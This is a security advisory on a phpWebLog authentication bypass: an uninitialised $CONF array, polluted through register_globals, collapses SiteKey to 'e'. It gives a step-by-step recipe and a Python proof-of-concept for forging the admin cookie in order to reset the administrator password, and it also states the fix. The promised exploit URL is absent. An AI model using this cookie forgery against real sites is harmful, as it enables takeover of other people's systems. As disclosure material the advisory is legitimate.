phpWebLog is a complete web news management system written in PHP. A vulnerability in the product lets remote attackers bypass the administrative authentication that protects some of its privileged functions, including changing the administrator password.
Credit:
The information has been provided by João Gouveia.
In common.inc.php, $CONF is not initialized as an array before it is filled from the database. A remote user can therefore pre-seed $CONF with request data (via register_globals) and alter the contents stored in it, which is enough to bypass the administrative authentication.
Technical details:
The following are the vulnerable parts of the code:
snip of common.inc.php:
<quote>
/*== read in configuration data ==*/
$sql = "SELECT * FROM T_Config";
$result = @mysql_query($sql,$db);
$nrows = mysql_num_rows($result);
</quote>
$CONF is never initialized as an array before the rows of T_Config are copied into it. If user-submitted data pre-seeds $CONF with a string, every $CONF[Name] = Value assignment in the read loop becomes a string-offset write: PHP treats the non-numeric index as offset 0 and stores only the first character of the value. After the loop, every $CONF[...] lookup therefore returns the first character of the last configuration value read, which is "language". With the language set to "english", all values of $CONF read as 'e'.
snip of common.inc.php:
<quote>
function F_isAdmin() {
global $HTTP_COOKIE_VARS,$CONF;
$name = md5($CONF["SiteKey"] . "_admin");
#echo $HTTP_COOKIE_VARS[$name];
#echo crypt("admin",$CONF["SiteKey"]);
return ($HTTP_COOKIE_VARS[$name]==md5(rot13($CONF["SiteKey"])) ? 1 : 0);
}
</quote>
As the function shows, authentication consists of matching a cookie against values derived solely from $CONF["SiteKey"]. Because the attacker controls that value (the first character of the language, 'e' for English), forging the cookie takes two steps:
Cookie name: calculate md5("<first char of language>_admin").
Cookie value: calculate md5(rot13("<first char of language>")).
snip of submit.php:
<quote>
case "config-extend":
$tmp = urlencode("Changes Saved.");
if (!empty($Passwd) || !empty($Passwd2)) {
if ($HTTP_POST_VARS["Passwd"]==$HTTP_POST_VARS["Passwd2"]) {
$sql = "UPDATE T_Config set ";
$sql .= "Value = '" .
md5($HTTP_POST_VARS["Passwd"]) . "' ";
$sql .= "WHERE Name = 'Passwd'";
$RET = @mysql_query($sql,$db);
(...)
(admin password changed)
</quote>
With the values calculated above, submit the following URL (based on an English configuration):
Any PHP errors that appear can be ignored. Once the request has been submitted, go to the admin area and set a new administrative password.
Assigning values to HTTP_*_VARS in this way only works in PHP versions below 4.0 rc1. Any user can, however, submit the same values by other means (a real cookie header and POST body carrying the same names and values) and achieve the same result.
All of this assumes the administrator changed the SiteKey from its default value of "phpWebLog", which should obviously be done. If it was left at the default, the $CONF trick is unnecessary: calculate the HTTP_COOKIE_VARS name and value from "phpWebLog" instead of 'e'.
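As an added worked example (not part of the advisory and not phpWebLog's own code), the following Python script models the $CONF collapse described above and forges the cookie pair that F_isAdmin() accepts, for both the default SiteKey "phpWebLog" and the polluted value 'e'. It assumes phpWebLog's rot13() is a plain ROT13 over ASCII letters (like PHP's str_rot13()); the T_Config rows and the custom SiteKey it uses are constructed sample data.

```python
import codecs
import hashlib

# Added example, not phpWebLog's own code. Models the $CONF collapse the
# advisory describes and forges the cookie that F_isAdmin() accepts.
# Assumptions: phpWebLog's rot13() is a plain ROT13 over ASCII letters (like
# PHP's str_rot13()); the T_Config rows below are constructed sample data
# with "language" as the last row, as the advisory states.

SAMPLE_T_CONFIG = [                      # constructed rows: (Name, Value)
    ("SiteKey", "s3cr3t-custom-key"),    # made-up non-default SiteKey
    ("SiteName", "Example News"),
    ("language", "english"),             # last row, as in the advisory
]


def rot13(text):
    """ROT13 over ASCII letters only, matching str_rot13() semantics."""
    return codecs.encode(text, "rot_13")


def md5_hex(text):
    return hashlib.md5(text.encode("latin-1")).hexdigest()


def php4_read_config(conf, rows):
    """Model of the common.inc.php read loop: $CONF[$row["Name"]] = $row["Value"].

    With $CONF initialised as an array the result is an ordinary dict. If
    $CONF arrived from the request as a string (register_globals), PHP 4
    treats the non-numeric index as string offset 0 and stores only the
    first character of each value, so the string ends up holding the first
    character of the LAST value written.
    """
    for name, value in rows:
        if isinstance(conf, str):
            conf = value[:1] + conf[1:]
        else:
            conf[name] = value
    return conf


def conf_get(conf, key):
    """$CONF[$key] as PHP 4 evaluates it: offset 0 when $CONF is a string."""
    return conf[0] if isinstance(conf, str) else conf[key]


def forge_admin_cookie(site_key):
    """(name, value) pair satisfying F_isAdmin() for the given SiteKey."""
    return md5_hex(site_key + "_admin"), md5_hex(rot13(site_key))


def f_is_admin(cookies, conf):
    """Python transcription of phpWebLog's F_isAdmin()."""
    site_key = conf_get(conf, "SiteKey")
    name = md5_hex(site_key + "_admin")
    return cookies.get(name) == md5_hex(rot13(site_key))


def scenarios():
    """Default SiteKey, polluted $CONF, and the hardened read, in that order."""
    results = {}

    # 1. Admin never changed SiteKey: forge directly from "phpWebLog".
    conf = php4_read_config({}, [("SiteKey", "phpWebLog"), ("language", "english")])
    name, value = forge_admin_cookie("phpWebLog")
    results["default_sitekey"] = f_is_admin({name: value}, conf)

    # 2. Custom SiteKey, but the request pre-seeded $CONF as a string.
    conf = php4_read_config("x", SAMPLE_T_CONFIG)   # "x" stands for any scalar
    assert conf_get(conf, "SiteKey") == "e"          # first char of "english"
    name, value = forge_admin_cookie("e")
    results["polluted_conf"] = f_is_admin({name: value}, conf)

    # 3. Fixed code: $CONF = array() before the loop, so request data cannot
    #    pre-seed it and the 'e'-based cookie is rejected.
    conf = php4_read_config({}, SAMPLE_T_CONFIG)
    results["hardened"] = f_is_admin({name: value}, conf)
    return results


if __name__ == "__main__":
    for case, admin in scenarios().items():
        print(f"{case:16s} -> F_isAdmin() = {int(admin)}")
```

The first two cases are accepted by the transcribed F_isAdmin() and the third is rejected. The third case is the fix: declare $CONF = array() before the read loop so request data cannot pre-seed it and, independently of that, change SiteKey from its default.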